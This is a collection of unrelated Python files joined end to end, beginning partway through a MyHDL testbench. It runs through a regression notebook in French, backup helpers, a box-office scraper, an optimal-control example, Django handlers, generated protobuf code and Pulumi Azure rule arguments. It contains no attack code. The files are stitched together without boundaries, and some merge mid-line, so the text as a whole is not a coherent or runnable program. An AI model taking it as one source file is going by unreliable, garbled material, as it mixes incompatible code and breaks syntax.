tvalid=s_axis_tag_valid, name='tag_source' ) tag_sink = axis_ep.AXIStreamSink() tag_sink_logic = tag_sink.create_logic( clk, rst, tdata=m_axis_tag, tvalid=m_axis_tag_valid, tready=m_axis_tag_ready, pause=tag_sink_pause, name='tag_sink' ) # DUT if os.system(build_cmd): raise Exception("Error running build command") dut = Cosimulation( "vvp -m myhdl %s.vvp -lxt2" % testbench, clk=clk, rst=rst, current_test=current_test, m_axis_tag=m_axis_tag, m_axis_tag_valid=m_axis_tag_valid, m_axis_tag_ready=m_axis_tag_ready, s_axis_tag=s_axis_tag, s_axis_tag_valid=s_axis_tag_valid, ext_tag_enable=ext_tag_enable, active_tags=active_tags ) @always(delay(4)) def clkgen(): clk.next = not clk @instance def check(): yield delay(100) yield clk.posedge rst.next = 1 yield clk.posedge rst.next = 0 yield clk.posedge yield delay(100) yield clk.posedge # testbench stimulus ext_tag_enable.next = 0 yield clk.posedge print("test 1: activate all tags") current_test.next = 1 tag_sink_pause.next = 0 yield delay(300) tag_sink_pause.next = 1 for k in range(32): assert tag_sink.recv().data[0] == k yield delay(100) yield clk.posedge print("test 2: return and reissue some tags") current_test.next = 2 for k in [2, 4, 6, 8]: tag_source.send([k]) tag_sink_pause.next = 0 yield delay(100) tag_sink_pause.next = 1 for k in [2, 4, 6, 8]: assert tag_sink.recv().data[0] == k yield delay(100) yield clk.posedge print("test 3: activate all extended tags") current_test.next = 3 rst.next = 1 ext_tag_enable.next = 1 yield clk.posedge rst.next = 0 tag_sink_pause.next = 0 yield delay(2100) tag_sink_pause.next = 1 for k in range(256): assert tag_sink.recv().data[0] == k yield delay(100) yield clk.posedge print("test 4: return and reissue some tags") current_test.next = 4 for k in [10, 20, 30, 40, 50, 60]: tag_source.send([k]) tag_sink_pause.next = 0 yield delay(100) tag_sink_pause.next = 1 for k in [10, 20, 30, 40, 50, 60]: assert tag_sink.recv().data[0] == k yield delay(100) raise StopSimulation return instances() def test_bench(): sim = Simulation(bench()) sim.run() if __name__ == '__main__': print("Running test...") test_bench() """ 从AplhaPose输出json文件中读取pose信息 """ import json import numpy as np def load_json(filename): with open(filename, "r") as fr: data = json.load(fr) return data def save_json(filename, data): with open(filename, "w", encoding="utf-8") as fw: json.dump(data, fw, ensure_ascii=False, indent=4) data = load_json("/home/lwk/github_mine/AlphaPose/examples/res/alphapose-results.json") results = dict() for item in data: image_id = int(item["image_id"].split(".")[0]) pose_2d = np.array(item["keypoints"]).reshape(17, 3).tolist() if image_id not in results: results[image_id] = [] results[image_id].append(pose_2d) save_json("1.json", results) prod_regression.py #!/usr/bin/env python # coding: utf-8 # # Tutoriel complet Regression lineaire # ## Utilisation de l'intégration continue # ## Collect data using pandas # In[59]: # modules nécessaires pour le notebook import pandas as pd import matplotlib.pyplot as plt import seaborn as sns from sklearn.linear_model import LinearRegression from sklearn import model_selection from sklearn import metrics # In[60]: # lire le fichier de données #utiliser le param index_col: Column to use as the row labels of the DataFrame df = pd.read_csv('Advertising.csv', index_col=0) df.head() # In[61]: df.describe() # # identification des descripteurs, cible et observations # Quels sont les descripteurs? On a 3 descripteurs dans ce dataset qui sont: # * TV # * Radio # * Newspaper # Quelle est la cible? # * Sales: vente d'un produit # Quelle est la forme ou shape du dataframe? # In[62]: df.shape # On voit que l'on a 200 observations avec 4 colonnes dont 3 sont des descripteurs # # Tracé des relations entre les descripteurs et la cible # In[63]: #utilisation d'une figure avec 3 plots aligné sur une ligne fig, axes = plt.subplots(1,3,sharey=False) df.plot(kind='scatter', x='TV', y='sales', ax=axes[0], figsize=(16,8)) df.plot(kind='scatter', x='radio', y='sales', ax=axes[1], figsize=(16,8)) df.plot(kind='scatter', x='newspaper', y='sales', ax=axes[2], figsize=(16,8)) # On voit au niveau des graphes qu'il existe une certaine relation linéaire entre TV et Sales ainsi que radio et Sales # In[64]: #meme chose mais avec seaborn sns.pairplot(data=df, x_vars=['TV','radio','newspaper'], y_vars='sales', height=7, aspect=0.7) # # Tracé des correlations entre les différents descripteurs et cible # * Cette partie n'a pas encore été faite. # # Développement du modele linear regression # In[65]: cols_predicteurs = ['TV','radio','newspaper'] #predicteurs X = df[cols_predicteurs] y = df.sales # In[66]: #Effectuer la séparation Training-Test X_train, X_test, y_train, y_test = model_selection.train_test_split(X, y , test_size = 0.2, random_state=42) #detail de chacun des sous-dataset print (X_train.shape, y_train.shape) print (X_test.shape, y_test.shape) # In[67]: #estimation des coeeficients du modele lineaire lm = LinearRegression() lm.fit(X_train,y_train) #Afficher les coefficients print(lm.intercept_) print(lm.coef_) # In[68]: #Afficher l'equation list(zip(cols_predicteurs, lm.coef_)) # In[69]: # proceder au test y_pred = lm.predict(X_test) # In[70]: import numpy as np #comparer les valeurs test et prédites test_pred_df = pd.DataFrame( { 'Valeurs test': y_test, 'Valeurs prédites': np.round( y_pred, 2), 'residuels': y_test - y_pred } ) test_pred_df[0:10] # In[71]: # RMSE mse = np.sqrt(metrics.mean_squared_error(y_test, y_pred)) print(np.sqrt(metrics.mean_squared_error(y_test, y_pred))) #Calcul du R-squared r2 = metrics.r2_score(y_test, y_pred) print(r2) # In[72]: # Write scores to a file with open("metrics.txt", 'w') as outfile: outfile.write("MSE: {0:2.1f} \n".format(mse)) outfile.write("R2: {0:2.1f}\n".format(r2)) # In[73]: #Référence: The Elements of Statistical Learning - and Friedman, voir https://web.stanford.edu/~hastie/ElemStatLearn/ #! /usr/bin/env python -u # coding=utf-8 import tensorflow as tf import pickle from models import get_base_graph from oracle import TimeOracle from utils import Timer, Timeline, log_progress __author__ = '' class ExperimentResult: def __init__(self, **kwargs): self.times = [] self.metadata = [] self.__dict__.update(kwargs) def save(self, filename): with open(filename, "wb") as fp: pickle.dump(self, fp) def save_time_oracle(self, filename): oracle = TimeOracle() for m in self.metadata: oracle.update(m) oracle.save(filename) class Experiment: def __init__(self, master, workers, base_model, ordering_algorithm, batch_size): self._master = master self._workers = workers self._model = base_model self._batch_size = batch_size self._ordering_algorithm = ordering_algorithm self._train = [] self._loss = [] self.get_model() def _get_scope(self): return "{}-{}".format(self._model, self._ordering_algorithm) def get_model(self): tf.reset_default_graph() worker_devices = [ "/job:worker/task:{worker}".format(worker=w) for w in range(self._workers) ] self._train = [] self._loss = [] scope = self._get_scope() first = True for worker_device in worker_devices: with tf.variable_scope("", reuse=not first): first = False with tf.device(tf.train.replica_device_setter(worker_device=worker_device, ps_tasks=1)): loss_ = get_base_graph(self._model, self._batch_size, scope) self._loss.append(loss_) opt = tf.train.GradientDescentOptimizer(learning_rate=0.001) train_ = opt.minimize(loss_) self._train.append(train_) def run(self, steps, stages=("fw", "train")): ret = [] for stage, target in [("fw", self._loss), ("train", self._train)]: if stage not in stages: continue result = ExperimentResult(workers=self._workers, base_model=self._model, batch_size=self._batch_size, ordering_algorithm=self._ordering_algorithm, stage=stage, steps=steps) with tf.train.MonitoredTrainingSession(master=self._master) as sess: # Warm up run sess.run(target) for _ in log_progress(range(steps)): with Timer() as timer: with Timeline() as timeline: sess.run(target, **timeline.kwargs()) result.times.append(timer.elapsed()) result.metadata.append(timeline.run_metadata) ret.append(result) return ret import os.path import subprocess def rsync_backup(config=None, source="", dest="", logger=None, options='avr'): cmd = 'rsync' if config: # Default is local backup source = config.source_location dest = config.dest_location if config.source_host and config.dest_host: logger.error("You can not have remote source and destination in same job") return False elif config.source_host: source = config.source_host + ':' + config.source_location elif config.dest_host: dest = config.dest_host + ':' + config.dest_location options = config.options _cmd = [cmd, '-' + options, source, dest] logger.debug('Starting rsync subprocess') job = subprocess.run(_cmd, shell=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) if job.returncode == 0: logger.debug(job.stdout.decode("utf-8")) return True else: logger.error("Something failed: ") logger.debug(job.stdout.decode("utf-8")) return False def rclone_backup(config=None, source="", dest="", logger=None, options='--transfers 10'): paths = ['/usr/sbin/rclone', '/usr/bin/rclone', '/snap/bin/rclone'] for path in paths: if os.path.isfile(path): cmd = path logger.debug('Using the %s executabale' % cmd) break # If last entry in paths is not found it is time to fail elif path == paths[-1]: logger.error('Cannot find rclone executable') return False if config: source = config.source_location dest = config.remote_name + ':' + config.remote_location options = config.options _cmd = [cmd, 'sync', source, dest] # Inserting options into command array _cmd[2:2] = options.split() else: logger.error("Config file required at this point") return False job = subprocess.run(_cmd, shell=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) if job.returncode == 0: logger.debug(job.stdout.decode("utf-8")) return True else: logger.error("Something failed: ") logger.debug(job.stdout.decode("utf-8")) return False def agent_picker(agent): return agent_declaration.get(agent, rsync_backup) # rsync_backup is default fallback # Add agents to dictionary so it is exported to the main program agent_declaration = { "rsync": rsync_backup, "rclone": rclone_backup } run2.py0 from pymongo import MongoClient import db, sys, pymongo import os, json, requests, urllib, calendar, time from datetime import datetime client = MongoClient(db.conn_string) db = client.oscar sep = ";" results = [["year","name","won","gross","gross per day","playdays in year","release date"]] # find all nominees for data in db.oscar_nominations_extended.find(): if data["film"]: boxOfficeData = None try: # fetch boxOfficeId url_params = urllib.urlencode({"movie": data["film"], "year": str(data["year"])}) resp = requests.get(url="http://boxofficeid.thomasbrueggemann.com/?" + url_params) boxOfficeData = json.loads(resp.text) if len(boxOfficeData) == 1: boxOfficeData = boxOfficeData[0] boxOfficeData["release"] = datetime.strptime(boxOfficeData["release"], "%Y-%m-%dT%H:%M:%S.000Z") boxOfficeData = boxOfficeData = db.boxoffice_movies.find_one({"boxOfficeId": boxOfficeData["boxOfficeId"]}) gross = "" grossPerDate = "" playDays = "" releaseDate = "" if boxOfficeData: lastDay = None # find gross at the end of the year if "history" in boxOfficeData: lastDay = boxOfficeData["history"][-1] if lastDay: gross = str(lastDay["grossToDate"]) grossPerDate = str(int(lastDay["grossToDate"] / int(lastDay["dayNumber"]))) playDays = str(lastDay["dayNumber"]) releaseDate = str(boxOfficeData["release"]) result = str(data["year"]) + sep result += boxOfficeData["boxOfficeId"] + sep if data["won"] == True: result += "1" + sep else: result += "0" + sep result += gross + sep result += grossPerDate + sep result += playDays + sep + releaseDate print result except: pass#!/usr/bin/env python # -*- coding: utf-8 -*- def f(grid): # 1 标定每个区域面程并标记 # 定义与(i,j) 相邻的点 def neighbor(grid, i, j): for x,y in [(i-1,j), (i+1, j), (i, j-1), (i,j+1)]: if 0<= x < len(grid) and 0<= y < len(grid[0]): yield (x,y) def mark(grid, i, j, num): """ num -> 当前的标记 """ total = 1 grid[i][j] = num queue = [(i,j)] while queue: a = queue.pop(0) for x,y in neighbor(grid, a[0], a[1]): if grid[x][y] == 1: queue.append((x,y)) grid[x][y] = num total += 1 return total num = 2 record = {} for i in range(len(grid)): for j in range(len(grid[0])): if grid[i][j] == 1: record[num] = mark(grid, i, j, num) num += 1 # 2 计算最大面积 print(grid) ans = max(record.values() or [0]) for r in xrange(len(grid)): for c in xrange(len(grid[1])): if grid[r][c] == 0: seen = {grid[nr][nc] for nr, nc in neighbor(grid, r, c) if grid[nr][nc] > 1} ans = max(ans, 1 + sum(record[i] for i in seen)) return ans grid = [[1, 1], [1, 1]] print(f(grid)) examples/torque_driven_with_contact/non_slipping_constraint.py import biorbd from biorbd_optim import ( Instant, OptimalControlProgram, ConstraintList, Constraint, ObjectiveList, Objective, DynamicsTypeList, DynamicsType, BidirectionalMapping, Mapping, BoundsList, QAndQDotBounds, InitialConditionsList, ShowResult, ) def prepare_ocp(model_path, phase_time, number_shooting_points, mu): # --- Options --- # # Model path biorbd_model = biorbd.Model(model_path) tau_min, tau_max, tau_init = -500, 500, 0 tau_mapping = BidirectionalMapping(Mapping([-1, -1, -1, 0]), Mapping([3])) # Add objective functions objective_functions = ObjectiveList() objective_functions.add(Objective.Mayer.MINIMIZE_PREDICTED_COM_HEIGHT, weight=-1) # Dynamics dynamics = DynamicsTypeList() dynamics.add(DynamicsType.TORQUE_DRIVEN_WITH_CONTACT) # Constraints constraints = ConstraintList() constraints.add( Constraint.CONTACT_FORCE_INEQUALITY, direction="GREATER_THAN", instant=Instant.ALL, contact_force_idx=1, boundary=0, ) constraints.add( Constraint.CONTACT_FORCE_INEQUALITY, direction="GREATER_THAN", instant=Instant.ALL, contact_force_idx=2, boundary=0, ) constraints.add( Constraint.NON_SLIPPING, instant=Instant.ALL, normal_component_idx=(1, 2), tangential_component_idx=0, static_friction_coefficient=mu, ) # Path constraint nb_q = biorbd_model.nbQ() nb_qdot = nb_q pose_at_first_node = [0, 0, -0.5, 0.5] # Initialize X_bounds x_bounds = BoundsList() x_bounds.add(QAndQDotBounds(biorbd_model)) x_bounds[0].min[:, 0] = pose_at_first_node + [0] * nb_qdot x_bounds[0].max[:, 0] = pose_at_first_node + [0] * nb_qdot # Initial guess x_init = InitialConditionsList() x_init.add(pose_at_first_node + [0] * nb_qdot) # Define control path constraint u_bounds = BoundsList() u_bounds.add([[tau_min] * tau_mapping.reduce.len, [tau_max] * tau_mapping.reduce.len]) u_init = InitialConditionsList() u_init.add([tau_init] * tau_mapping.reduce.len) # ------------- # return OptimalControlProgram( biorbd_model, dynamics, number_shooting_points, phase_time, x_init, u_init, x_bounds, u_bounds, objective_functions, constraints, tau_mapping=tau_mapping, ) if __name__ == "__main__": model_path = "2segments_4dof_2contacts.bioMod" t = 0.6 ns = 10 mu = 0.2 ocp = prepare_ocp(model_path=model_path, phase_time=t, number_shooting_points=ns, mu=mu) # --- Solve the program --- # sol = ocp.solve(show_online_optim=True) # --- Show results --- # result = ShowResult(ocp, sol) result.animate() from django.conf import settings from django.db.models.signals import post_save from .models import Registration from .tasks import pass_push_apple from .tasks import pass_push_android def post_save_signal_pass_push( instance: settings.PASS_MODEL, created, **kwargs ): """After saving passes""" # Update registered devices registrations = Registration.objects.filter(pass_object=instance) if registrations.exists(): for registration in registrations: try: # android tokens are longer if len(registration.device.push_token) > 100: pass_push_android.delay( registration.device.push_token ) else: # pass_push_apple(pass_) pass_push_apple.delay( registration.device.push_token ) except Exception as e: print(e) if settings.WALLET_ENABLE_NOTIFICATIONS: post_save.connect( post_save_signal_pass_push, sender=settings.PASS_MODEL ) # -*- coding: utf-8 -*- # Generated by the protocol buffer compiler. DO NOT EDIT! # source: common.proto from google.protobuf import descriptor as _descriptor from google.protobuf import message as _message from google.protobuf import reflection as _reflection from google.protobuf import symbol_database as _symbol_database # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() DESCRIPTOR = _descriptor.FileDescriptor( name='common.proto', package='haomo.hios', syntax='proto3', serialized_options=None, serialized_pb=b'\n\x0c\x63ommon.proto\x12\nhaomo.hios\"\x1d\n\x05Vec2d\x12\t\n\x01x\x18\x01 \x01(\x01\x12\t\n\x01y\x18\x02 \x01(\x01\"(\n\x05Vec3d\x12\t\n\x01x\x18\x01 \x01(\x01\x12\t\n\x01y\x18\x02 \x01(\x01\x12\t\n\x01z\x18\x03 \x01(\x01\"3\n\x05Vec4d\x12\t\n\x01x\x18\x01 \x01(\x01\x12\t\n\x01y\x18\x02 \x01(\x01\x12\t\n\x01z\x18\x03 \x01(\x01\x12\t\n\x01\x65\x18\x04 \x01(\x01\"*\n\x07Point3D\x12\t\n\x01x\x18\x01 \x01(\x01\x12\t\n\x01y\x18\x02 \x01(\x01\x12\t\n\x01z\x18\x03 \x01(\x01\"<\n\nQuaternion\x12\n\n\x02qx\x18\x01 \x01(\x01\x12\n\n\x02qy\x18\x02 \x01(\x01\x12\n\n\x02qz\x18\x03 \x01(\x01\x12\n\n\x02qw\x18\x04 \x01(\x01\"4\n\x07RawData\x12\x0c\n\x04\x64\x61ta\x18\x01 \x01(\x0c\x12\x0e\n\x06length\x18\x02 \x01(\x04\x12\x0b\n\x03src\x18\x03 \x03(\tb\x06proto3' ) _VEC2D = _descriptor.Descriptor( name='Vec2d', full_name='haomo.hios.Vec2d', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='x', full_name='haomo.hios.Vec2d.x', index=0, number=1, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='y', full_name='haomo.hios.Vec2d.y', index=1, number=2, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=28, serialized_end=57, ) _VEC3D = _descriptor.Descriptor( name='Vec3d', full_name='haomo.hios.Vec3d', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='x', full_name='haomo.hios.Vec3d.x', index=0, number=1, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='y', full_name='haomo.hios.Vec3d.y', index=1, number=2, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='z', full_name='haomo.hios.Vec3d.z', index=2, number=3, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=59, serialized_end=99, ) _VEC4D = _descriptor.Descriptor( name='Vec4d', full_name='haomo.hios.Vec4d', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='x', full_name='haomo.hios.Vec4d.x', index=0, number=1, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='y', full_name='haomo.hios.Vec4d.y', index=1, number=2, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='z', full_name='haomo.hios.Vec4d.z', index=2, number=3, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='e', full_name='haomo.hios.Vec4d.e', index=3, number=4, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=101, serialized_end=152, ) _POINT3D = _descriptor.Descriptor( name='Point3D', full_name='haomo.hios.Point3D', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='x', full_name='haomo.hios.Point3D.x', index=0, number=1, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='y', full_name='haomo.hios.Point3D.y', index=1, number=2, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='z', full_name='haomo.hios.Point3D.z', index=2, number=3, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=154, serialized_end=196, ) _QUATERNION = _descriptor.Descriptor( name='Quaternion', full_name='haomo.hios.Quaternion', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='qx', full_name='haomo.hios.Quaternion.qx', index=0, number=1, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='qy', full_name='haomo.hios.Quaternion.qy', index=1, number=2, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='qz', full_name='haomo.hios.Quaternion.qz', index=2, number=3, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='qw', full_name='haomo.hios.Quaternion.qw', index=3, number=4, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=198, serialized_end=258, ) _RAWDATA = _descriptor.Descriptor( name='RawData', full_name='haomo.hios.RawData', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='data', full_name='haomo.hios.RawData.data', index=0, number=1, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b"", message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='length', full_name='haomo.hios.RawData.length', index=1, number=2, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='src', full_name='haomo.hios.RawData.src', index=2, number=3, type=9, cpp_type=9, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=260, serialized_end=312, ) DESCRIPTOR.message_types_by_name['Vec2d'] = _VEC2D DESCRIPTOR.message_types_by_name['Vec3d'] = _VEC3D DESCRIPTOR.message_types_by_name['Vec4d'] = _VEC4D DESCRIPTOR.message_types_by_name['Point3D'] = _POINT3D DESCRIPTOR.message_types_by_name['Quaternion'] = _QUATERNION DESCRIPTOR.message_types_by_name['RawData'] = _RAWDATA _sym_db.RegisterFileDescriptor(DESCRIPTOR) Vec2d = _reflection.GeneratedProtocolMessageType('Vec2d', (_message.Message,), { 'DESCRIPTOR' : _VEC2D, '__module__' : 'common_pb2' # @@protoc_insertion_point(class_scope:haomo.hios.Vec2d) }) _sym_db.RegisterMessage(Vec2d) Vec3d = _reflection.GeneratedProtocolMessageType('Vec3d', (_message.Message,), { 'DESCRIPTOR' : _VEC3D, '__module__' : 'common_pb2' # @@protoc_insertion_point(class_scope:haomo.hios.Vec3d) }) _sym_db.RegisterMessage(Vec3d) Vec4d = _reflection.GeneratedProtocolMessageType('Vec4d', (_message.Message,), { 'DESCRIPTOR' : _VEC4D, '__module__' : 'common_pb2' # @@protoc_insertion_point(class_scope:haomo.hios.Vec4d) }) _sym_db.RegisterMessage(Vec4d) Point3D = _reflection.GeneratedProtocolMessageType('Point3D', (_message.Message,), { 'DESCRIPTOR' : _POINT3D, '__module__' : 'common_pb2' # @@protoc_insertion_point(class_scope:haomo.hios.Point3D) }) _sym_db.RegisterMessage(Point3D) Quaternion = _reflection.GeneratedProtocolMessageType('Quaternion', (_message.Message,), { 'DESCRIPTOR' : _QUATERNION, '__module__' : 'common_pb2' # @@protoc_insertion_point(class_scope:haomo.hios.Quaternion) }) _sym_db.RegisterMessage(Quaternion) RawData = _reflection.GeneratedProtocolMessageType('RawData', (_message.Message,), { 'DESCRIPTOR' : _RAWDATA, '__module__' : 'common_pb2' # @@protoc_insertion_point(class_scope:haomo.hios.RawData) }) _sym_db.RegisterMessage(RawData) # @@protoc_insertion_point(module_scope) from threading import Thread import time from django.core.management.base import BaseCommand from clouds.models import Instance class Command(BaseCommand): help = 'monitor cloud resource periodly' def handle(self, *args, **options): while True: for instance in Instance.objects.exclude(uuid=None): Thread(target=instance.monitor).start() time.sleep(0.1) time.sleep(300)# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities __all__ = ['NetworkSecurityRuleArgs', 'NetworkSecurityRule'] @pulumi.input_type class NetworkSecurityRuleArgs: def __init__(__self__, *, access: pulumi.Input[str], direction: pulumi.Input[str], network_security_group_name: pulumi.Input[str], priority: pulumi.Input[int], protocol: pulumi.Input[str], resource_group_name: pulumi.Input[str], description: Optional[pulumi.Input[str]] = None, destination_address_prefix: Optional[pulumi.Input[str]] = None, destination_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, destination_application_security_group_ids: Optional[pulumi.Input[str]] = None, destination_port_range: Optional[pulumi.Input[str]] = None, destination_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, name: Optional[pulumi.Input[str]] = None, source_address_prefix: Optional[pulumi.Input[str]] = None, source_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, source_application_security_group_ids: Optional[pulumi.Input[str]] = None, source_port_range: Optional[pulumi.Input[str]] = None, source_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None): """ The set of arguments for constructing a NetworkSecurityRule resource. :param pulumi.Input[str] access: Specifies whether network traffic is allowed or denied. Possible values are `Allow` and `Deny`. :param pulumi.Input[str] direction: The direction specifies if rule will be evaluated on incoming or outgoing traffic. Possible values are `Inbound` and `Outbound`. :param pulumi.Input[str] network_security_group_name: The name of the Network Security Group that we want to attach the rule to. Changing this forces a new resource to be created. :param pulumi.Input[int] priority: Specifies the priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule. :param pulumi.Input[str] protocol: Network protocol this rule applies to. Possible values include `Tcp`, `Udp`, `Icmp`, `Esp`, `Ah` or `*` (which matches all). :param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Network Security Rule. Changing this forces a new resource to be created. :param pulumi.Input[str] description: A description for this rule. Restricted to 140 characters. :param pulumi.Input[str] destination_address_prefix: CIDR or destination IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. Besides, it also supports all available Service Tags like ‘Sql.WestEurope‘, ‘Storage.EastUS‘, etc. You can list the available service tags with the cli: ```shell az network list-service-tags --location westcentralus```. For further information please see [Azure CLI - az network list-service-tags](https://docs.microsoft.com/en-us/cli/azure/network?view=azure-cli-latest#az-network-list-service-tags). This is required if `destination_address_prefixes` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] destination_address_prefixes: List of destination address prefixes. Tags may not be used. This is required if `destination_address_prefix` is not specified. :param pulumi.Input[str] destination_application_security_group_ids: A List of destination Application Security Group ID's :param pulumi.Input[str] destination_port_range: Destination Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `destination_port_ranges` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] destination_port_ranges: List of destination ports or port ranges. This is required if `destination_port_range` is not specified. :param pulumi.Input[str] name: The name of the security rule. This needs to be unique across all Rules in the Network Security Group. Changing this forces a new resource to be created. :param pulumi.Input[str] source_address_prefix: CIDR or source IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. This is required if `source_address_prefixes` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] source_address_prefixes: List of source address prefixes. Tags may not be used. This is required if `source_address_prefix` is not specified. :param pulumi.Input[str] source_application_security_group_ids: A List of source Application Security Group ID's :param pulumi.Input[str] source_port_range: Source Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `source_port_ranges` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] source_port_ranges: List of source ports or port ranges. This is required if `source_port_range` is not specified. """ pulumi.set(__self__, "access", access) pulumi.set(__self__, "direction", direction) pulumi.set(__self__, "network_security_group_name", network_security_group_name) pulumi.set(__self__, "priority", priority) pulumi.set(__self__, "protocol", protocol) pulumi.set(__self__, "resource_group_name", resource_group_name) if description is not None: pulumi.set(__self__, "description", description) if destination_address_prefix is not None: pulumi.set(__self__, "destination_address_prefix", destination_address_prefix) if destination_address_prefixes is not None: pulumi.set(__self__, "destination_address_prefixes", destination_address_prefixes) if destination_application_security_group_ids is not None: pulumi.set(__self__, "destination_application_security_group_ids", destination_application_security_group_ids) if destination_port_range is not None: pulumi.set(__self__, "destination_port_range", destination_port_range) if destination_port_ranges is not None: pulumi.set(__self__, "destination_port_ranges", destination_port_ranges) if name is not None: pulumi.set(__self__, "name", name) if source_address_prefix is not None: pulumi.set(__self__, "source_address_prefix", source_address_prefix) if source_address_prefixes is not None: pulumi.set(__self__, "source_address_prefixes", source_address_prefixes) if source_application_security_group_ids is not None: pulumi.set(__self__, "source_application_security_group_ids", source_application_security_group_ids) 